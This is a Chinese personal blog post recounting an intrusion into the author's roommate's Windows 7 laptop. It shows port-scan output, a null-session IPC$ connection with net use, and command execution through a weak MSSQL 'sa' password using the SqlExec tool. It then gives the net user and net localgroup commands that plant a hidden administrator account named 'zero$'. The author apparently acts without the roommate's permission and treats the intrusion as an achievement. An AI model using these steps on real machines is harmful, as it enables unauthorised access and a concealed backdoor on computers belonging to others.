MSSQL内网入侵笔记

环境:都是Win7

最近室友的本本老是出问题,他怀疑是黑客入侵,因为莫名多出个管理员账户(虽然没登录过),以及最近PC的内存使用率莫名上涨(本就2G。。)

PS:虽然我不认为他这电脑有什么好东西要黑的- -

netstat -an查看了下他的爱机打开的端口。马丹3389啊什么的都在开着,我呵呵。。你就算是学霸也不能这样任性啊。然后把这些端口都关了,最后决定扫一下他的电脑~

扫描

扫描之后得到下面结果:

[172.16.138.178]: 主机名称: "XXX-pc"
[172.16.138.178]: 发现  "端口: 135/epmap" !!!
[172.16.138.178]: 发现  "端口: 139/netbios-ssn" !!!
[172.16.138.178]: 发现  "端口: 445/microsoft-ds" !!!
[172.16.138.178]: 发现  "端口: 1433/ms-sql-s" !!!
[172.16.138.178]: IPC NULL session connection success !!!
[172.16.138.178]: 发现  "MSSQL account: sa/123" !!!

空口令尝试

空口令在开着呢,也有139/445,连上试试:

C:\Users\Administrator>net use \\172.16.138.178\ipc$ "" /user:""
命令成功完成。

OK,可以连上,映射一下试试:

C:\Users\Administrator>net use z: \\172.16.138.178\c$ "" /user:""
发生系统错误 5。

拒绝访问。

好吧,权限不够,刚才扫描也没扫到管理员的弱口令,看来这个管理员权限是得不到了,换个方向吧。

MSSQL连接

刚刚还扫描到了MSSQL的sa权限的弱口令,啧啧,我只能说no zuo no die,一个系统只要有一个破绽,你就完了。。

没安装MSSQL,就下载一个MSSQL简易远程连接以及操作工具——SqlExec,连接界面如下:

技术分享

ok,连接成功,我们可以执行任何cmd命令了。

创建隐藏账户:

net user zero$ 123 /add
net localgroup administrators zero$ /add

这样就获得了一个管理员权限的隐藏账户,在cmd下用net user是看不见的,除非进入控制面板下的“用户和账户”。

这样就全部ok了,总算实现了入侵一次室友电脑的伟大目(can)(nian),等他醒了让他把弱口令改了吧。。


PS:第一次入侵(Web不算),记录下来留个纪念。


附上一些资料:

经典的ipc$入侵:http://www.xfocus.net/articles/200303/493.html

SqlExec(报毒,可用):http://down.51cto.com/data/85369

本文出自 “zero4eva” 博客,请务必保留此出处http://zero4eva.blog.51cto.com/7558298/1591983

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。